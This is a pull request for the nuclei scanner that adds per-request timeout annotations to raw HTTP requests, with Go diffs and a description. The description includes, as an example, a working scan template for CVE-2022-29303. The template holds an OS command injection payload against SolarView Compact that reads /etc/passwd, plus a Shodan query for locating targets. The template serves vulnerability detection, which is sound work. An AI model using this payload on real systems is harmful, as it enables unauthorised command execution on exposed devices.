### PR TITLE
Added http request timeout support with annotations

### DIFF
--- a/v2/pkg/protocols/http/build_request.go
+++ b/v2/pkg/protocols/http/build_request.go
@@ -290,7 +290,7 @@ func (r *requestGenerator) handleRawWithPayloads(ctx context.Context, rawRequest
 		return nil, err
 	}
 
-	if reqWithAnnotations, hasAnnotations := parseAnnotations(rawRequest, req); hasAnnotations {
+	if reqWithAnnotations, hasAnnotations := r.request.parseAnnotations(rawRequest, req); hasAnnotations {
 		req = reqWithAnnotations
 		request = request.WithContext(req.Context())
 	}

--- a/v2/pkg/protocols/http/http.go
+++ b/v2/pkg/protocols/http/http.go
@@ -120,12 +120,13 @@ type Request struct {
 
 	CompiledOperators *operators.Operators `yaml:"-"`
 
-	options       *protocols.ExecuterOptions
-	totalRequests int
-	customHeaders map[string]string
-	generator     *generators.PayloadGenerator // optional, only enabled when using payloads
-	httpClient    *retryablehttp.Client
-	rawhttpClient *rawhttp.Client
+	options           *protocols.ExecuterOptions
+	connConfiguration *httpclientpool.Configuration
+	totalRequests     int
+	customHeaders     map[string]string
+	generator         *generators.PayloadGenerator // optional, only enabled when using payloads
+	httpClient        *retryablehttp.Client
+	rawhttpClient     *rawhttp.Client
 
 	// description: |
 	//   SelfContained specifies if the request is self-contained.
@@ -233,9 +234,17 @@ func (request *Request) Compile(options *protocols.ExecuterOptions) error {
 	connectionConfiguration := &httpclientpool.Configuration{
 		Threads:         request.Threads,
 		MaxRedirects:    request.MaxRedirects,
+		NoTimeout:       false,
 		FollowRedirects: request.Redirects,
 		CookieReuse:     request.CookieReuse,
 	}
+	// If we have request level timeout, ignore http client timeouts
+	for _, req := range request.Raw {
+		if reTimeoutAnnotation.MatchString(req) {
+			connectionConfiguration.NoTimeout = true
+		}
+	}
+	request.connConfiguration = connectionConfiguration
 
 	// if the headers contain "Connection" we need to disable the automatic keep alive of the standard library
 	if _, hasConnectionHeader := request.Headers["Connection"]; hasConnectionHeader {

--- a/v2/pkg/protocols/http/request_annotations.go
+++ b/v2/pkg/protocols/http/request_annotations.go
@@ -79,12 +79,12 @@ func (r *Request) parseAnnotations(rawRequest string, request *http.Request) (*h
 		if duration := reTimeoutAnnotation.FindStringSubmatch(rawRequest); len(duration) > 0 {
 			value := strings.TrimSpace(duration[1])
 			if parsed, err := time.ParseDuration(value); err == nil {
-				// nolint:lostcancel // cancelled automatically by withTimeout
+				//nolint:lostcancel // cancelled automatically by withTimeout
 				ctx, _ := context.WithTimeout(request.Context(), parsed)
 				request = request.Clone(ctx)
 			}
 		} else {
-			// nolint:lostcancel // cancelled automatically by withTimeout
+			//nolint:lostcancel // cancelled automatically by withTimeout
 			ctx, _ := context.WithTimeout(request.Context(), time.Duration(r.options.Options.Timeout)*time.Second)
 			request = request.Clone(ctx)
 		}

--- a/v2/pkg/protocols/http/request_annotations.go
+++ b/v2/pkg/protocols/http/request_annotations.go
@@ -79,12 +79,12 @@ func (r *Request) parseAnnotations(rawRequest string, request *http.Request) (*h
 		if duration := reTimeoutAnnotation.FindStringSubmatch(rawRequest); len(duration) > 0 {
 			value := strings.TrimSpace(duration[1])
 			if parsed, err := time.ParseDuration(value); err == nil {
-				//nolint:lostcancel // cancelled automatically by withTimeout
+				//nolint:govet // cancelled automatically by withTimeout
 				ctx, _ := context.WithTimeout(request.Context(), parsed)
 				request = request.Clone(ctx)
 			}
 		} else {
-			//nolint:lostcancel // cancelled automatically by withTimeout
+			//nolint:govet // cancelled automatically by withTimeout
 			ctx, _ := context.WithTimeout(request.Context(), time.Duration(r.options.Options.Timeout)*time.Second)
 			request = request.Clone(ctx)
 		}

--- a/v2/pkg/protocols/http/request_annotations.go
+++ b/v2/pkg/protocols/http/request_annotations.go
@@ -79,10 +79,12 @@ func (r *Request) parseAnnotations(rawRequest string, request *http.Request) (*h
 		if duration := reTimeoutAnnotation.FindStringSubmatch(rawRequest); len(duration) > 0 {
 			value := strings.TrimSpace(duration[1])
 			if parsed, err := time.ParseDuration(value); err == nil {
+				// nolint:lostcancel // cancelled automatically by withTimeout
 				ctx, _ := context.WithTimeout(request.Context(), parsed)
 				request = request.Clone(ctx)
 			}
 		} else {
+			// nolint:lostcancel // cancelled automatically by withTimeout
 			ctx, _ := context.WithTimeout(request.Context(), time.Duration(r.options.Options.Timeout)*time.Second)
 			request = request.Clone(ctx)
 		}

--- a/v2/pkg/protocols/http/request_annotations.go
+++ b/v2/pkg/protocols/http/request_annotations.go
@@ -6,6 +6,7 @@ import (
 	"net/http"
 	"regexp"
 	"strings"
+	"time"
 
 	"github.com/projectdiscovery/fastdialer/fastdialer"
 	"github.com/projectdiscovery/iputil"
@@ -21,10 +22,12 @@ var (
 	// request.host: takes the value from the host header
 	// target: overiddes with the specific value
 	reSniAnnotation = regexp.MustCompile(`(?m)^@tls-sni:\s*(.+)\s*$`)
+	// @timeout:duration overrides the input timout with a custom duration
+	reTimeoutAnnotation = regexp.MustCompile(`(?m)^@timeout:\s*(.+)\s*$`)
 )
 
 // parseAnnotations and override requests settings
-func parseAnnotations(rawRequest string, request *http.Request) (*http.Request, bool) {
+func (r *Request) parseAnnotations(rawRequest string, request *http.Request) (*http.Request, bool) {
 	// parse request for known ovverride annotations
 	var modified bool
 	// @Host:target
@@ -68,6 +71,23 @@ func parseAnnotations(rawRequest string, request *http.Request) (*http.Request, 
 		request = request.Clone(ctx)
 		modified = true
 	}
+
+	// @timeout:duration
+	if r.connConfiguration.NoTimeout {
+		modified = true
+
+		if duration := reTimeoutAnnotation.FindStringSubmatch(rawRequest); len(duration) > 0 {
+			value := strings.TrimSpace(duration[1])
+			if parsed, err := time.ParseDuration(value); err == nil {
+				ctx, _ := context.WithTimeout(request.Context(), parsed)
+				request = request.Clone(ctx)
+			}
+		} else {
+			ctx, _ := context.WithTimeout(request.Context(), time.Duration(r.options.Options.Timeout)*time.Second)
+			request = request.Clone(ctx)
+		}
+	}
+
 	return request, modified
 }
 


### PR DESCRIPTION
## Proposed changes

<!-- Describe the overall picture of your modifications to help maintainers understand the pull request. PRs are required to be associated to their related issue tickets or feature request. -->
Closes #2024 by adding support for per raw HTTP request timeout support with annotations.

Example template - 

```yaml
id: CVE-2022-29303

info:
  name: SolarView Compact 6.0 - OS Command Injection
  author: badboycxcc
  severity: high
  reference:
    - https://www.exploit-db.com/exploits/50940
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303
  metadata:
    verified: true
    shodan-query: http.html:"SolarView Compact"
  tags: cve,cve2022,rce,injection

variables:
  cmd: "cat${IFS}/etc/passwd"

requests:
  - raw:
      - |
        @timeout: 25s
        POST /conf_mail.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M

    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0"
```


## Checklist

<!-- Put an "x" in the boxes that apply. You can also fill these out after creating the PR. If you're unsure about any of them, don't hesitate to ask. We're here to help! This is simply a reminder of what we are going to look for before merging your code. -->

- [ ] Pull request is created against the [dev](https://github.com/projectdiscovery/nuclei/tree/dev) branch
- [ ] All checks passed (lint, unit/integration/regression tests etc.) with my changes
- [ ] I have added tests that prove my fix is effective or that my feature works
- [ ] I have added necessary documentation (if appropriate)